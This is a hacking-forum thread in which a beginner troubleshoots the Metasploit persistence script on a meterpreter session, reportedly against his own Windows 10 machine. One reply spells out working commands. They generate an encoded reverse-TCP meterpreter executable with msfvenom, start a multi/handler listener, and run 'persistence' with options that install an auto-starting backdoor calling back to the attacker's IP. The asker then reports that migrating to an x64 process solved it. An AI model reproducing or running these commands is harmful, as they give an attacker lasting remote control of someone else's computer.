Forum Thread: I Can't Seem to Run a Persistence Script! (Stupid? Maybe)

Hi internet folk,
Well i want to run a persistence script as mentioned but everytime i try to run it, it says that the windows version of meterpreter is not supported with this script. I have tried migrating to a x86/windows process but that doesn't seem to work either. I'm also fairly new to exploiting but I have succeeded with rdp'ing to another computer and the problem begins when i try to run a persistent backdoor to the other computer. Hope somebody can help me with this. :P
#firstpost

4 Responses

What type of machine are you exploiting? If you don't know, just type "ls" (without the quotation marks) and please tell us the output. Persistence can only be done on Windows machines.

And what exploit and payload combination are you running?

I'm exploiting my own Windows 10 machine with setoolkit.

Setoolkit:
---> 1
---> 9
---> 1

Im using a x86 injection btw.

Have you tried with msfvenom, work every time for me.

*msfvenom -p windows/meterpreter/reversetcp LHOST=yourip LPORT=443 -e cmd/powershell_base64 -i 5 -f exe > /root/Desktop/anything.exe

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your_ip
set LPORT 443
exploit*

--------run anything.exe

meterpreter > run persistence -A -S -X -i 30 -p 443 -r your_ip -(you entered X 30)
meterpreter > reboot (To check if it's work)

I fixed it!

The solution was to migrate to a x64 process and then execute the script..

Thanks anyways!

Share Your Thoughts

  • Hot
  • Active